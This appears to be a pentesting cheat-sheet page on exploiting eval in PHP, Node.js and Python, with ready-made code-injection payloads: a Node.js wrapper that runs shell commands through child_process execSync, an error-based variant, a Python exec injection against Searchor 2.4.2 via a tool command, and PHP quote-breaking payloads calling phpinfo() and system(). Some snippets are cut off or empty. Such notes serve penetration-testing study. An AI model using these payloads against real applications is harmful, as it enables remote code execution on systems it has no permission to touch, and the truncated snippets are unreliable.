Exploiting 'eval' Function

Almost every language that we encounter during pentesting has an eval function that takes a string and execute the code inside.

Such function should be sparingly. Do not pass user input to them.

  • PHP Eval Function
$payload = "echo 'Hello, World!';";
  • JavaScript/Node.js Eval Function
payload = 'console.log("Hello, World!")'
  • Python Eval (or Exec) Function
payload = "print('Hello, World!')"

Node.js 'eval' function

glitch celestial node_eval

If the input is evaluated using eval, we can write some code in it.

  • Normal input: 5
  • Normal input wrapped: (()=>5)()
  • Normal input fully wrapped: (()=>{return 5})()
  • If it works, we can add some code in-between
(() => {
  try {
    return `Output: ${require('child_process').execSync('whoami').toString()}`
  } catch (error) {
    return `Error executing command: ${error}`
// without spaces

It's not always possible to return a string, but if errors are returned, you may use them instead of the usual vector.

(()=>{throw new Error(require("child_process").execSync("whoami").toString())})()

Additional payloads:


Python 'eval' function

Searchor 2.4.2


Poc (python script) (0.01k ⭐).

$ onectf request -u URL -X POST -d 'engine=Yahoo' -p query -i '<q>, exec(""))#'

You can execute python code inside exec.

PHP 'eval' function

php_eval php_eval_advanced_filters_bypass

You can inject a function call such as phpinfo() while using comments such as ;// by remove appended code. If the payload is prepended by a quote, then add a matching quote.

$x = '';
eval('$x = "' . $payload . '";');
echo $x;

A few possible payloads:

$payload = '" . phpinfo() . "';
$payload = '" . phpinfo() . ";//';
$payload = '" . system("whoami") . ";//';

For payloads and filter bypass, refer to my PHP Cheatsheet.